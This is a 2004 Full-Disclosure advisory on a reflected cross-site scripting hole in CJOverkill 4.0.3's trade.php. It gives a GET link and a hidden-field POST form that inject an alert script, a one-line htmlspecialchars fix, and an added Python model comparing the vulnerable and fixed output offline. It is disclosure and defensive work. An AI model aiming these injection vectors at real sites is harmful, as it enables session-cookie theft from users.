[Full-Disclosure] CJOverkill 4.0.3 XSS Proof of Concept

From: aCiDBiTS (acidbits_at_gmail.com)
Date: 10/11/04

    To: full-disclosure@lists.netsys.com
    Date: Mon, 11 Oct 2004 10:55:48 +0200
    
    

    +--------------------------------------------------------+
    | CJOverkill 4.0.3 Cross Site Scripting Proof of Concept |
    | By aCiDBiTS acidbits@gmail.com 10-Oct-2004             |
    +--------------------------------------------------------+

        [ Your web application needs a security audit? ]
        [ Email me !                                   ]

    ------------
    Introduction
    ------------

    (http://cjoverkill.icefire.org/) "CJOverkill is a powerful traffic
    trading script that keeps its users happy with their site's growing
    traffic. Tested on high traffic sites and proven its outstanding
    performance, CJOverkill's security measures prevent others from trying
    to cheat you. With this script ,you can rest assured your site is in
    good hands."

    -------------
    Vulnerability
    -------------

    Some parameters in trade.php are not sanitized before being echoed
    back. This can be exploited to inject HTML/script code that executes
    in the user's browser, allowing an attacker to steal the user's cookie
    for that site. Older versions may also be vulnerable.
    The vendor has been notified; an official patch will be released.

    ----------------
    Proof of Concept
    ----------------

    There are two ways to XSS through trade.php:

    (1.) GET. The victim clicks a link like the following (requires
    register_globals ON):

    http://URL_to_cjoverkill_script/trade.php?tms[0]=Yes,%20there%20is%20a%20way%20;-)%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E

    (2.) POST. The victim clicks the submit button of a form carrying these
    hidden fields:

    <form action="http://URL_to_cjoverkill_script/trade.php" method="post">
      <input name="email" type="hidden" value="fake">
      <input name="add" type="hidden" value="1">
      <input name="url" type="hidden"
             value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;">
      <input name="" type="submit" value="Click me !">
    </form>

    ---------
    Quick fix
    ---------

    Edit trade.php, line 135:

            echo ("$tms[$i]<br>");

    Replace it with:

            echo (htmlspecialchars($tms[$i])."<br>");
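    The following Python is an added example; it is not part of the advisory
    and not CJOverkill's code. It models the echo on line 135 as quoted above,
    the htmlspecialchars() quick fix, and why the GET vector depends on
    register_globals, so the vulnerable and fixed behaviour can be compared
    offline. The host name is the advisory's placeholder, and the
    register_globals model assumes $tms is not filled from anywhere else on
    the GET path (an assumption, not something taken from the script's source).

```python
# Added example, not code from aCiDBiTS's advisory or from CJOverkill itself.
# It models the echo on line 135 of trade.php as the advisory quotes it, the
# proposed htmlspecialchars() fix, and the GET vector's dependence on
# register_globals, so the two behaviours can be compared offline.
from urllib.parse import parse_qs, urlencode, urlparse

# The script tag used in the advisory's PoC; String.fromCharCode(88,83,83)
# spells "XSS" without putting that literal in the URL.
PAYLOAD = ('<script>alert(String.fromCharCode(88)+String.fromCharCode(83)'
           '+String.fromCharCode(83));</script>')

# Placeholder host copied from the advisory; assumed, not a real install.
BASE_URL = "http://URL_to_cjoverkill_script/trade.php"


def htmlspecialchars(s: str) -> str:
    """Python equivalent of PHP htmlspecialchars() with its default flags
    (ENT_COMPAT): & < > and the double quote are escaped, the single quote
    is not.  Sufficient for text between tags, which is where trade.php
    prints $tms[$i]; output inside an attribute would need ENT_QUOTES."""
    return (s.replace("&", "&amp;")
             .replace("<", "&lt;")
             .replace(">", "&gt;")
             .replace('"', "&quot;"))


def render_vulnerable(tms: list[str]) -> str:
    """Models the original line 135: echo ("$tms[$i]<br>");"""
    return "".join(f"{t}<br>" for t in tms)


def render_fixed(tms: list[str]) -> str:
    """Models the quick fix: echo (htmlspecialchars($tms[$i])."<br>");"""
    return "".join(f"{htmlspecialchars(t)}<br>" for t in tms)


def get_vector(base: str = BASE_URL) -> str:
    """Builds the advisory's GET link: the payload travels in tms[0]."""
    return base + "?" + urlencode({"tms[0]": "Yes, there is a way ;-)" + PAYLOAD})


def tms_from_request(url: str, register_globals: bool) -> list[str]:
    """Models how $tms gets populated.  With register_globals on, PHP turns a
    query parameter named tms[0] directly into $tms[0]; with it off the array
    stays empty unless trade.php fills it from elsewhere (assumed here not to
    happen on the GET path, which is why the advisory says the GET vector
    needs register_globals ON)."""
    if not register_globals:
        return []
    return parse_qs(urlparse(url).query).get("tms[0]", [])


def reflects_script(body: str) -> bool:
    """Check a tester would run on a lab copy's response: is the injected
    <script> tag present in the HTML unescaped?  An escaped reflection
    (&lt;script&gt;) is the fixed behaviour and does not count."""
    return "<script>" in body.lower()


if __name__ == "__main__":
    link = get_vector()
    for rg in (True, False):
        tms = tms_from_request(link, register_globals=rg)
        print(f"register_globals={rg}: vulnerable echo reflects script ->",
              reflects_script(render_vulnerable(tms)))
    print("fixed echo reflects script ->",
          reflects_script(render_fixed(tms_from_request(link, True))))
```

    Running it shows the original echo reflecting the script tag only when
    register_globals is on, and the htmlspecialchars() version never
    reflecting it; the POST vector is not modelled because how the form
    handler moves `url` into $tms is not visible on this page.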

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

